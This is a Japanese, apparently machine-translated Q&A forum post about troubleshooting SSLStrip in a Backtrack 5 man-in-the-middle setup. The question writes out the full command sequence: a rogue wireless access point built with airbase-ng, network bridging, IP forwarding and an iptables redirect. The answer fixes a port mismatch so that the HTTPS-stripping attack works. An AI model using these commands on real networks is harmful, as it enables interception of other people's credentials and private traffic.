2

Backtrack 5 を使用した MITM セットアップで SSLStrip に問題があります。外部ワイヤレス カードを使用してワイヤレス信号をブロードキャストし、イーサネット経由でルーティングしています。Wireshark でパケットを正常に表示していますが、SSLStrip を使用して SSL データを表示したいと考えています。これらは、MITM をセットアップするために使用する予備コマンドです。

airmon-ng start wlan1
airbase-ng --essid mitm 11 mon0

--新しいターミナル--

brctl addbr mitm-bridge
brctl addif mitm-bridge eth0
brctl addif mitm-bridge at0
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
ifconfig mitm-bridge 192.168.0.199 up
echo 1 > /proc/sys/net/ipv4/ip_forward

この時点で、WireShark でパケット データを表示できます。SSLStrip をセットアップするには、次の手順に従います。

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666
cd /pentest/web/sslstrip
sslstrip -l 8080

セッションを終了して sslstrip.log を開くと、ファイルにデータが書き込まれていません。また、iptables リダイレクトを実行すると、インターネットにアクセスできなくなります。考えられる問題を教えてください。

4

1 に答える 1

6

sslstrip と arp ポイズニングが稼働していると仮定すると、ポートのリダイレクトに問題があります。

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666

http トラフィックを 127.0.0.1 ポート 666 にリダイレクトします。

cd /pentest/web/sslstrip
sslstrip -l 8080

ポート 8080 で着信トラフィックのリッスンを開始する sslstrip

U は、ポートのリダイレクトを 8080 に変更できます

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

またはリッスン ポートを 666 に変更します。

sslstrip -l 666

于 2012-04-06T13:26:38.873 に答える